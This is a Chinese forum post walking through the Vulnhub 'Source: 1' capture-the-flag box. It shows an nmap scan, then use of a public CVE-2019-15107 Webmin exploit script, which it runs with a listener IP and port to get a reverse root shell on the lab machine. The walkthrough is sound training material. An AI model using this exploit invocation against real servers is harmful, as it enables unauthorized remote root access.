登录
/
注册
首页
论坛
其它
首页
科技
业界
安全
程序
广播
Follow
关于
博客
发1篇日志+1圆
记录
发1条记录+2圆币
发帖说明
登录
/
注册
账号
自动登录
找回密码
密码
登录
立即注册
搜索
搜索
关闭
CSDN热搜
程序园
精品问答
技术交流
资源下载
本版
帖子
用户
软件
问答
教程
代码
VIP网盘
VIP申请
网盘
联系我们
道具
勋章
任务
设置
我的收藏
退出
腾讯QQ
微信登录
返回列表
首页
›
业界区
›
业界
›
Vulnhub-Source-1(CVE-2019-15107)
Vulnhub-Source-1(CVE-2019-15107)
[ 复制链接 ]
各卧唯
2025-6-4 21:39:19
一、靶机搭建
选择打开选项
选中下载的ova文件,然后导入选择一个存放路径即可
如果遇到不兼容的情况,可以打开
.vmx
修改,改为和虚拟机一个版本号
二、信息收集
官方信息
Name: Source: 1
Date release: 17 Jul 2020
难度:初级
描述:为 AttackerKB 聊天室创建的简单 CTF 盒子。这是练习的独立版本。这个框可能会出现在供应链攻击的后续房间里,因为它是一个很好的最新例子。
复制代码
扫ip
靶机ip:
192.168.108.154
扫开放服务和端口
开放了
22和10000
端口
指纹探测
nmap 192.168.108.154 -p 22,10000 -sV -sC -O --version-all
复制代码
没什么可以利用的信息,看到
10000
端口版本信息,
MiniServ 1.890
(Webmin httpd)
目录扫描
dirsearch
扫描看看,扫不出来
dirb
扫描,无结果
三、Web渗渗透
访问
10000
端口,是一个登录网站,源码和指纹信息都没有什么利用点
想到刚才找到的网站版本号,查找一下历史漏洞
下载下来查看一下,需要结合
msf
才能使用
CVE-2019-15107-Webmin远程命令执行漏洞
上网搜一下看看,存在漏洞,参考文章:
https://github.com/squid22/Webmin_CVE-2019-15107
https://github.com/jas502n/CVE-2019-15107?tab=readme-ov-file
复制代码
下载exp到kali
四、提权
赋予权限
开启监听端口,并执行脚本
./webmin_exploit.py 192.168.108.154 10000 192.168.108.130 4444
复制代码
拿到root权限
在跟目录下发现
flag
flag:
THM{UPDATE_YOUR_INSTALL}
来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
回复
本版积分规则
回帖并转播
回帖后跳转到最后一页
签约作者
程序园优秀签约作者
发帖
各卧唯
2025-6-4 21:39:19
关注
0
粉丝关注
18
主题发布
板块介绍填写区域,请于后台编辑
财富榜{圆}
敖可
9984
黎瑞芝
9990
杭环
9988
4
猷咎
9988
5
凶契帽
9988
6
接快背
9988
7
氛疵
9988
8
恐肩
9986
9
虽裘侪
9986
10
里豳朝
9986
查看更多